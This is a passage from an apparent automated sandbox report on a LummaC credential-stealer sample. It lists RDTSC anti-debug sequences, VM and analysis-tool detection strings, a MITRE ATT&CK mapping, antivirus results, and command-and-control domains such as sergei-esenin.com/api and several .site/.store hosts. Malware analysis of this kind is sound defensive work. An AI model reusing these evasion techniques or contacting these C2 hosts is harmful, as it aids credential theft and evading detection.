    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3402 second address: 3B3409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3409 second address: 3B3414 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F65504F5A46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C28C5 second address: 3C28D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 ja 00007F655118F746h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C40B9 second address: 3C40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C40BE second address: 3C40D7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F655118F74Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C40D7 second address: 3C40FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jl 00007F65504F5A46h 0x0000000c jmp 00007F65504F5A59h 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C40FD second address: 3C4103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C4103 second address: 3C411C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C411C second address: 3C4120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2ACF second address: 2C2ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65504F5A4Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C6A13 second address: 3C6A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C6B7D second address: 3C6B8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F65504F5A46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DF23B second address: 3DF245 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE1BF second address: 3DE1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE1C5 second address: 3DE1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F655118F74Bh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE54C second address: 3DE55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 js 00007F65504F5A52h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DE55D second address: 3DE563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DEADD second address: 3DEAE9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65504F5A4Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DEC46 second address: 3DEC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DEF21 second address: 3DEF4D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65504F5A46h 0x00000008 jmp 00007F65504F5A54h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F65504F5A4Eh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E074E second address: 3E0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E3063 second address: 3E306A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E32FC second address: 3E3300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E33B2 second address: 3E33EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F65504F5A48h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 or edx, dword ptr [ebp+1245A600h] 0x00000029 push 00000004h 0x0000002b cld 0x0000002c call 00007F65504F5A49h 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 pop edx 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D4C second address: 3E4D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D52 second address: 3E4D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D56 second address: 3E4D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F655118F74Bh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D69 second address: 3E4D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4D6D second address: 3E4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a je 00007F655118F757h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0CD1 second address: 51E0D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f pushad 0x00000010 mov cl, dh 0x00000012 popad 0x00000013 test ecx, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F65504F5A4Ch 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0D02 second address: 51E0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0D06 second address: 51E0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 303C6F second address: 303C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 153997 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 153A52 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1511D6 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2FF4EF instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 37C607 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 6020Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 6020Thread sleep time: -30000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000002.1311652132.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1309204959.00000000013ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp?
    Source: file.exe, 00000000.00000002.1311410801.000000000138E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311410801.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00135BB0 LdrInitializeThunk,0_2_00135BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: !@Program Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping631
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truefalse
      		unknown
      sergei-esenin.com
      		172.67.206.204
      		truetrue
        		unknown
        eaglepawnoy.store
        		unknown
        		unknownfalse
          		unknown
          bathdoomgaz.store
          		unknown
          		unknownfalse
            		unknown
            spirittunek.store
            		unknown
            		unknownfalse
              		unknown
              licendfilteo.site
              		unknown
              		unknowntrue
                		unknown
                studennotediw.store
                		unknown
                		unknownfalse
                  		unknown
                  mobbipenju.store
                  		unknown
                  		unknownfalse
                    		unknown
                    clearancek.site
                    		unknown
                    		unknowntrue
                      		unknown
                      dissapoiznw.store
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.stortrue
                          		unknown
                          mobbipenju.stortrue
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            		unknown
                            bathdoomgaz.stortrue
                              		unknown
                              dissapoiznw.stortrue
                                		unknown
                                spirittunek.stortrue
                                  		unknown
                                  eaglepawnoy.stortrue
                                    		unknown
                                    clearancek.sitetrue
                                      		unknown
                                      licendfilteo.sitetrue
                                        		unknown
                                        https://sergei-esenin.com/apitrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://player.vimeo.comfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://sergei-esenin.com/file.exe, 00000000.00000002.1311652132.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.youtube.comfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.comfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://steam.tvfile.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://steam.tvDfile.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpfalse
